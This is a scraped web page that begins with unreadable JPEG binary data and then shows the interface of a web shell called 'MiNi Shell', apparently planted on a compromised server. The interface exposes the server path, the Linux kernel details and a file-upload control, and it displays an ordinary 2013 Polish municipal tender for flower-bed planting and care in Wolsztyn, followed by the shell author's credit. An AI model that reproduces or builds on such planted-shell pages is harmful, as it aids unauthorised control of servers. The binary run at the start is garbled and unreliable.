JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130118/26032-N-2013.html

<p class="kh_header"><b>Wolsztyn: Świadczenie uslug zwiazanych z nasadzeniem i pielęgnacją kwietników w Wolsztynie i wsiach na terenie gminy w okresie od 1 marca do 31 grudnia 2013r.</b><br>
<b>Numer ogłoszenia: 26032 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wolsztyn , Rynek 1, 64-200 Wolsztyn, woj. wielkopolskie, tel. (068) 347 45 00, faks 068 347 45 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie uslug zwiazanych z nasadzeniem i pielęgnacją kwietników w Wolsztynie i wsiach na terenie gminy w okresie od 1 marca do 31 grudnia 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotowego zamówienia publicznego obejmuje następujące usługi: 
a)  Nasadzenia kwiatów sezonowych.
b)  Pielęgnacja nasadzeń (wg potrzeb):
      -    Pielenie;
      -    Podlewanie ( wraz z kosztem wody);
      -    Nawożenie;
       -   Ochrona  przed szkodnikami owadzimi i grzybowymi (insektycydy i fungicydy);
-	 usunięcie przekwitłych kwiatów  i przygotowanie kwietników do zimy;
-	 uzupełnianie ubytków, wymiany roślin zniszczonych, zdewastowanych, chorych, źle wyglądających;
     c)   Utrzymanie porządku wokół kwietników w tym usuwanie chwastów wokół  
    kwietników;
d)	Koszenie trawników zlokalizowanych przy kwietnikach  raz w tygodniu o pow. całkowitej 5600 m2.
e)  pielęgnacja  nasadzeń wieloletnich w ciągu ul. 5 Stycznia,     Dworcowej i  
     Poznańskiej i Drzymały o łącznej pow. około 1.630 m2 
-	rodzaj prac koniecznych  do wykonania: pielenie, podlewanie wraz z kosztem wody, nawożenie, ochrona przed szkodnikami owadzimi i grzybowymi (insektycydy i fungicydy)
Przedmiot zamówienia  sklada   z 3 zadań:
 Zadanie nr 1 - Dwukrotne obsadzenie roślinami sezonowymi kwietników znajdujących  na płycie Rynku wraz z pielęgnacją,
Zadanie nr 2 - Obsadzenie kwietników w mieście Wolsztyn - roślinami sezonowymi łącznie z ich pielęgnacją,
Zadanie nr 3- Pielęgnacja nasadzeń wieloletnich w ciągu ul. 5 Stycznia , Dworcowej, Poznańskiej i Drzymały o łącznej pow. około 1.630 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.20.00.00-9, 77.31.21.00-1, 77.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiającynie wymaga spełnienia szczególnych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadanie niezbędnej wiedzy i doświadczenia Wykonawca wykaże, iż posiada doświadczenie w wykonywaniu usług o zakresie i wartości porównywalnej z niniejszym zamówieniem, a w szczególności udokumentuje, że   zrealizował jako wykonawca, w okresie ostatnich 3 lat:
-	co najmniej 1 zadanie polegające na nasadzeniu i pielęgnacji kwietników  w ilości minimum 10 kwietników o  łącznej  powierzchni minimum ok. 500 m2  (dotyczy Wykonawców składających ofertę dla Zadania nr 1 i dla Zadania nr 2);
-	co najmniej  1 zadanie polegające na nasadzeniu i pielęgnacji kwietnika o powierzchni  minimum 40 m2 (dotyczy Wykonawców składających ofertę dla Zadania nr 3).
     W przypadku składania oferty wspólnej  warunki określone w przedmiotowym punkcie Wykonawcy muszą  spełniać łącznie.

Dla potwierdzenia spełniania wyżej opisanego warunku Wykonawca winien złożyć dokument pn. Wykaz usług opisany w rozdziale III SIWZ, w punkcie Informacja o świadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania potencjałem technicznym Wykonawca wykaże, że dysponuje niezbędnym sprzętem do wykonania  zadania w tym miedzy innymi:
- ciągnikiem z przyczepą lub innym pojazdem skrzyniowym umożliwiającym transport 
  odpadów
W przypadku składania oferty wspólnej  warunki określone w przedmiotowym punkcie Wykonawcy muszą  spełniać łącznie.
Dla potwierdzenia spełnienia wyżej  opisanego warunku Wykonawca  winien  złożyć dokument pn. Wykaz narzędzi , wyposażenia zakładu i urządzeń technicznych opisany w rozdziale III SIWZ w punkcie Informacja o oświadczeniach i dokumentach, jakie  maja  dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału  w postępowaniu
 
W przypadku składania oferty wspólnej  warunki określone w przedmiotowym punkcie Wykonawcy muszą  spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełniania szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

W przypadku składania oferty wspólnej warunek opisany w tym punkcie  każdy z Wykonawców winien spełniać osobno.
Dla potwierdzenia spełnieni wyżej opisanego warunku Wykonawca winien złożyć opłaconą polisę wg warunków opisanych w rozdziale III SIWZ, w punkcie Informacja o świadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca winien złożyć również:
-kosztorysy ofertowe w odniesieniu do poszczególnych zadań.
-Zamawiający zaleca  również dołączyć do oferty parafowanego  wzoru istotnych postanowień umowy (przez osobę-/y/ uprawnioną-/e/ do reprezentowania wykonawcy w przetargu) jako akceptację ich treści i warunków wg załącznika nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy dopuszcza możliwość wprowadzenia istotnych zmian postanowień  zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w opisanych poniżej sytuacjach.
1.Termin realizacji zamówienia może ulec zmianie w sytuacji:
a) udzielenia w trakcie realizacji umowy zamówień dodatkowych, związanych z         realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin          zakończenia jej realizacji (powodujących konieczność jego wydłużenia),
b) wystąpienia  niekorzystnych warunków  atmosferycznych powodujących  wstrzymanie wykonania umowy, potwierdzonych pisemnie przez    Zamawiającego, przy czym przesunięcie terminu usługi  nastąpi o tyle dni,   przez ile trwało ich wstrzymanie( nie uważa się za czynnik zakłócający wpływ   czynników atmosferycznych w okresie realizacji prac, które Wykonawca winien  wziąć pod uwagę przy składaniu oferty - cykl pór roku).
c)wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do  zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności:  wojny, aktu terroryzmu, klęski żywiołowe, strajki  oraz akty władzy i administracji publicznej.
2.Inne możliwe zmiany w postanowieniach umowy:
a)zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron, za uprzednią zgodą,
b) zmiany podwykonawców w zakresie określonym w ofercie lub wprowadzenie          nowych z zastrzeżeniem, iż nie mogą oni realizować części zamówienia   przewidzianej do wyłącznej kompetencji Wykonawcy ( o ile takie zastrzeżenie  zostało dokonane przez Zamawiającego w SIWZ),
c) zmiana wynikająca ze zmiany danych podmiotowych Wykonawcy.
3. warunki zmian:
- inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
 -  zgoda obu stron umowy
-   uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy,  obniżenie  kosztów,   zapewnienie optymalnych parametrów technicznych  i jakościowych robót i prac,                        -   forma  zmian: aneks do umowy w formie pisemnej pod rygorem  nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.wolsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miesjki w Wolsztynie, Rynek 1, 64-200 Wolsztyn, .wielkopolskie, pok. nr 44
opłata za SIWZ 50,00zł (pięćdziesiąt złotych 00/100).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 09:00, miejsce: Urząd Miejski w Wolsztynie, Rynek 1, 64-200 Wolsztyn, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inne informacje:
Zamawijacy nie przewiduje zawarcia umowy ramowej.
Zamawiajacy nie zamierza ustanowić dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dwukrotne obsadzenie roślinami sezonowymi kwietników znajdujących na płycie Rynku wraz z pielęgnacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagospodarowanie zielenią Rynku w Wolsztynie zgodnie z warunkami i zakresem prac określonymi w projekcie  wykonanym przez  zespół autorski: Jacek Łuczak i Marcin Piechota - Projekt  wykonawczy nasadzeń na płycie rynku w Wolsztynie (załącznik nr 3 do SIWZ) między innymi:
       1. dwukrotne  obsadzenie roślinami sezonowymi kwietników  znajdujących się na płycie 
           Rynku,
       2. prace pielęgnacyjne posadzonych roślin (podlewanie, odchwaszczanie i spulchnianie 
           podłoża wokół roślin, czyszczenie roślin  z przekwitniętych kwiatów, zabiegi ochrony 
           roślin)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.20.00.00-9, 77.31.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsadzenie kwietników w mieście Wolsztyn - roślinami sezonowymi łącznie z ich pielęgnacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac koniecznych do wykonania :
a)  Nasadzenia kwiatów sezonowych.
b)  Pielęgnacja nasadzeń (wg potrzeb):
      -    Pielenie;
      -    Podlewanie ( wraz z kosztem wody);
      -    Nawożenie;
       -   Ochrona  przed szkodnikami owadzimi i grzybowymi (insektycydy i fungicydy);
-	 usunięcie przekwitłych kwiatów  i przygotowanie kwietników do zimy;
-	 uzupełnianie ubytków, wymiany roślin zniszczonych, zdewastowanych, chorych, źle wyglądających;
     c)   Utrzymanie porządku wokół kwietników w tym usuwanie chwastów wokół  
    kwietników;
e)	Koszenie trawników zlokalizowanych przy kwietnikach  raz w tygodniu 

Lokalizacja kwietników i terenów zielonych :
1.Kwietniki przy budynku - ul. Drzymały 

2. Kwietnik przy ul. Sturnego (koło placu zabaw)  

3. Kwietniki przy ul. Sadowej w Wolsztynie 

4. Kwietnik przy ul. Parkowej 
                                               
5. Kwietnik przy ul. Strzeleckiej (przy szpitalu) 
                
6. Kwietniki  przy ul. 5 Stycznia - Pomnik Konstytucji 3 Maja 
      
7. Kwietnik  na Rynku przy budynku nr 14 
 
8.Kwietnik przy ul. Asnyka 

9.Kwietniki przy ul. 5 Stycznia łącznie z trawnikiem (skwer Hoene Wrońskiego):

10. Kwietniki - ul. Roberta Kocha 

11. Kwietniki -  ul.Tylna:  

12.  Kwiatony - ul. 5 Stycznia 
 	
13. Obsadzenie  90 szt. donic  pelargoniami czerwonymi   bluszczolistnymi i ipomea jano-zielona  - donice  dostarcza zamawiający.   Donice    należy zawiesić w    miejscach wskazanych przez zamawiającego.
       
14.Kwietniki  na molo - rabaty , donice , korytka,

15. Kwietnik przy ul. Spokojnej,       

16. Kwietniki  na Pl. Kościuszki  

17. Kwietniki przy ul. Słowackiego 

18. Trawnik przy ul. Słowackiego na odcinku  od tzw. Koziego Rynku do skrzyżowania z ul. Konopnickiej   -   koszenie  około 900 m2 trawników - jeden raz w tygodniu.

19.  Kwietnik przy ul. Słowackiego tzw Kozi Rynek , koszenie  około 500 m2 trawników - jeden raz w tygodniu.
      
20. Rondo w Karpicku

21. Różne - kwiatony betonowe o wym. 0,90 m x 0,90 m na terenie Wolsztyna oraz wsi: Karpicku i Tłoki:
        
22. Kwietniki w Gminnym Centrum Informacji:
       		
 23. Dostarczenie  sadzonek kwiatów dla wsi: Obra, Nowa Obra, Świętno,  
       Powodowo, Chorzemin, Widzim Stary, Wroniawy, Nowa Dąbrowa, Tłoki,  
       Wilcze, Rudno, Berzyna, Niałek Wielki, Gościeszyn, Nowe Tłoki o łącznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.20.00.00-9, 77.31.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pielęgnacja nasadzeń wieloletnich w ciągu ul. 5 Stycznia , Dworcowej, Poznańskiej i Drzymały o łącznej pow. około 1.630 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres  prac koniecznych do wykonania :
- pielęgnacja nasadzeń wieloletnich, 
	- dodatkowe obsadzenie 8 kwietników   przy ul. Dworcowej  o łącznej powierzchni
 około 46  m2 .

(rodzaj prac koniecznych  do wykonania: pielenie, podlewanie wraz z kosztem wody, nawożenie, ochrona przed szkodnikami owadzimi i grzybowymi (insektycydy i fungicydy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.20.00.00-9, 77.31.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com